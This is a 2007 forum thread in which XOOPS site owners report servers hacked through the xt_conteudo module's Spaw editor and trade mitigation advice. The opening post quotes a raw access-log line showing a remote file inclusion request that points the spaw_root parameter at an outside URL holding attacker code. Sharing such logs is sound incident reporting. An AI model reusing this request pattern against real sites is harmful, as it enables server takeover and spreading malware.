1
guus20
xt_contuedo is NOT safe
  • 2007/5/30 15:19

  • guus20

  • Just popping in

  • Posts: 1

  • Since: 2007/5/30


Our server was hacked trough xt_contuedo by inserting malicious code in the Spaw editor. Then they used our server for sending out spyware.



LOG
============================

209.85.105.25 - - [30/May/2007:00:41:42 +0200] "GET /modules/xt_conteudo/admin/spaw/main.php?spaw_root=http://ikhlas.com.my/57.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
============================

Please be adviced xt_contedo isn't SAFE.

2
JimLunsford
Re: xt_contuedo is NOT safe

Isn't that also built into the Mastop Publishing module? Big problems for that module if that is true.

3
orgunozcu
Re: xt_contuedo is NOT safe
  • 2007/5/30 17:50

  • orgunozcu

  • Not too shy to talk

  • Posts: 136

  • Since: 2005/9/1 5


it is very big problem. somone tried to my site too. now i cant use Spaw and other editors for xt_conteudo and some smiler modules.

how can we solve??

4
topet05
Re: xt_contuedo is NOT safe
  • 2007/5/30 18:27

  • topet05

  • Just popping in

  • Posts: 33

  • Since: 2003/4/19


Mastop Publish was developed from zero and dont use the Spaw Editor, but TinyMCE.
XT-Conteudo was discontinued lot time ago.
How fix it? Change your XT-Conteudo for Mastop Publish.
We will develop a upgrader soon.
Regards

5
wcrwcr
Re: xt_contuedo is NOT safe
  • 2007/5/30 23:51

  • wcrwcr

  • Home away from home

  • Posts: 1114

  • Since: 2003/12/12


Hi all

Just to inform that the old tinycontent is vulnerable too
.
SAme happens to me in an old XOOPS site.

I?ve just deleted the spawn folder..just in case

6
ewonline
Re: xt_contuedo is NOT safe
  • 2007/5/31 4:18

  • ewonline

  • Not too shy to talk

  • Posts: 198

  • Since: 2004/11/17


You should edit your post to remove that URL so others dont find out use that exploit.
Resized Image

Login

Username:
Password:

Lost Password? Register now!

Who's Online

81 user(s) are online (42 user(s) are browsing Support Forums)


Members: 0


Guests: 81


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Jun 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits